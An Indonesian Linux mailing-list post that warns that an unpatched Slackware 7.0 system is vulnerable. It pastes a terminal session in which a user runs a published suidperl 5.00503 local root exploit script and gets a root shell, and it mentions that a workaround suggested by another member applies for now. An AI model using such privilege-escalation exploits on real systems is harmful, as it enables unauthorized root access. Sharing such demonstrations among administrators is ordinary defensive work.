Slackware 7.0 yg masih blom di kutak katik rawan banget nich :( sniffing:~$ whoami raincoat sniffing:~$ ./xperl.sh Suidperl 5.00503 (and newer) root exploit ----------------------------------------- Written by Michal Zalewski <[EMAIL PROTECTED]> With great respect to Sebastian Krahmer... [*] Using suidperl=/usr/bin/suidperl, suidbin=/usr/bin/passwd... [+] Checks passed, compiling flares and helper applications... cc bighole.c -o bighole cc sush.c -o sush [+] Setting up environment... [+] Starting exploit. It could take up to 5 minutes in order to get [+] working root shell. WARNING - WARNING - WARNING: it could cause [+] heavy system load. [+] VOILA, BABE :-) Entering rootshell... bash-2.03# ^^^^^^^^^^ ckckckkckkc kayanya workaroundnya sementara seperti yg di saranin ronny deh :( ps: om rumy dah coba blom :-) -- Wassalam, Vauxhall and I http://www.boedoet7.org -------------------------------------------------------------------------- Utk berhenti langganan, kirim email ke [EMAIL PROTECTED] Informasi arsip di http://www.linux.or.id/milis.php3 Pengelola dapat dihubungi lewat [EMAIL PROTECTED]
